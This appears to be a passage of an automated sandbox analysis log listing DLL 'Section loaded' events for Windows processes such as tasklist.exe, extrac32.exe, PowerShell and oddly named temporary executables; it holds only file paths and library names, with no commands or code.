Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
